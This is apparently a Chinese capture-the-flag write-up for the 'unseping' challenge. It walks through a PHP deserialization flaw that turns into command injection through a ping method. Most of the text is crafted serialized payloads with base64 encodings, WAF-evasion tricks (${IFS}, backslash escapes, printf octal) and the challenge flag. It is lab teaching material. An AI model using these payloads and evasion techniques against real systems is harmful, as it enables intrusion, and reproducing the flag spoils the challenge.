攻防世界: unseping

攻防世界: unseping

本文知识点:

  1. ${IFS}能够在空格被过滤的时候使用
  2. 查看文件内容的命令除了cat,还有moreless
  3. printf命令能够打印八进制的数据,比如通过"\57"打印/,来规避检查
  4. 有些字符能够通过前面添加转义符\来规避检查,例如phpph\p
  5. 可以在字符串中添加双引号来规避检查,如flagf""lag

代码中的魔术方法的含义:

  • __construct:构造函数,对象构造的时候自动调用

  • __destruct: 析构函数,释放对象,销毁的时候自动调用

  • __wakeup: 这个函数是反序列化的时候自动调用

从代码的整体含义来看,我们需要传递一个名为ctf的参数给到后端,然后后端会按照base64的解码方式将数据解码出来。

  1. 在析构函数中我们可以看到,他会将我们传递的参数的方法通过call_user_func_array调用执行。

  2. 因此我们可以考虑传入ease这个类的自身的方法ping,用这个函数来执行我们想要的代码。

    • 因此我们可以确定我们传入的序列化后的对象的method的值为ping
  3. 接下来是args变量的值,一个很简单的想法就是cat flag

    • base64编码前代码:

      O:4:"ease":2:{s:6:"method";s:4:"ping";s:4:"args";a:1:{i:0;s:8:"cat flag";}}

    • base64编码后:

      Tzo0OiJlYXNlIjoyOntzOjY6Im1ldGhvZCI7czo0OiJwaW5nIjtzOjQ6ImFyZ3MiO2E6MTp7aTowO3M6ODoiY2F0IGZsYWciO319

可以看到,服务器返回的结果,监测到我们的意图了。如下图:


为什么呢?这就是前面提到的反序列化函数__wakeup造成的结果,我们传递的参数经过反写劣化函数unserialize会自动调用对象的__wakeup方法,这个方法会调用waf函数将我们传递的参数进行过滤。因此我们需要用特殊的方法绕过这个过滤。

  • 这个很容易让我想到题目unserialize3 中的跳过__wakeup函数的执行,通过增加属性的数量来规避自动调用,但是经过查询这个版本的PHP没有这个漏洞。
  • 因此我们只能通过其他方法来避免上述的过滤。

绕过检查

  1. 查看当前有哪些文件,通过下面的序列化对象绕过

    O:4:"ease":2:{s:6:"method";s:4:"ping";s:4:"args";a:1:{i:0;s:3:"l\s";}}

    对应的base64编码

    Tzo0OiJlYXNlIjoyOntzOjY6Im1ldGhvZCI7czo0OiJwaW5nIjtzOjQ6ImFyZ3MiO2E6MTp7aTowO3M6MzoibFxzIjt9fQ==

    结果如下:

  2. 其实这里的flag_1s_here是一个目录,并不能通过cat查看。但是我们可以查看这个目录下的内容,使用转义字符 和**${IFS}代替空格**绕过检查,其对象如下:

    O:4:"ease":2:{s:6:"method";s:4:"ping";s:4:"args";a:1:{i:0;s:22:"l\s${IFS}f\lag_1s_here";}}

    编码结果:

    Tzo0OiJlYXNlIjoyOntzOjY6Im1ldGhvZCI7czo0OiJwaW5nIjtzOjQ6ImFyZ3MiO2E6MTp7aTowO3M6MjI6ImxccyR7SUZTfWZcbGFnXzFzX2hlcmUiO319

    返回结果:

  3. 查看flag_831b69012c67b35f.php内容,为了绕过\的检查,使用printf${IFS}"\57",其序列化对象如下:

    O:4:"ease":2:{s:6:"method";s:4:"ping";s:4:"args";a:1:{i:0;s:70:"more${IFS}f\lag_1s_here$(printf${IFS}"\57")fl\ag_831b69012c67b35f.ph\p";}}

    编码结果:

    Tzo0OiJlYXNlIjoyOntzOjY6Im1ldGhvZCI7czo0OiJwaW5nIjtzOjQ6ImFyZ3MiO2E6MTp7aTowO3M6NzA6Im1vcmUke0lGU31mXGxhZ18xc19oZXJlJChwcmludGYke0lGU30iXDU3IilmbFxhZ184MzFiNjkwMTJjNjdiMzVmLnBoXHAiO319

最后结果:cyberpeace{74e55251a34e1cdd704c46e7c20dfa8d}

相关推荐
2401_873479402 小时前
企业安全团队如何配合公安协查?IP查询在电子取证中的技术实践
tcp/ip·安全·网络安全·php
祁白_3 小时前
nmap工具笔记整理
笔记·web安全·测试
L1624763 小时前
Win11 共享→Windows Server 访问故障总结(极简可复用)
开发语言·windows·php
niucloud-admin4 小时前
PHP V6 单商户常见问题——本地phpstudy部署,访问域名/admin 、域名/wap无法自动跳转对应首页问题
php
隔窗听雨眠5 小时前
MySQL主从延迟根因诊断法
开发语言·php
niucloud-admin7 小时前
PHP V6 单商户常见问题——运行内存太小导致的报错处理
php
nbwenren7 小时前
办公AI实测:Gemini3、GPT-4o、Claude3.5谁更强?
服务器·数据库·php
hopetomorrow8 小时前
学习路之PHP --PHP 常用扩展及作用表
开发语言·学习·php
YaBingSec8 小时前
玄机网络安全靶场:Hadoop YARN ResourceManager 未授权 RCE WP
大数据·数据库·hadoop·redis·笔记·分布式·web安全
Chengbei118 小时前
面向红队的 AI 赋能全场景流量分析仪 网页 / APP / 终端 / IoT 全域 HTTPS 抓包解密利器
人工智能·物联网·网络协议·web安全·网络安全·https·系统安全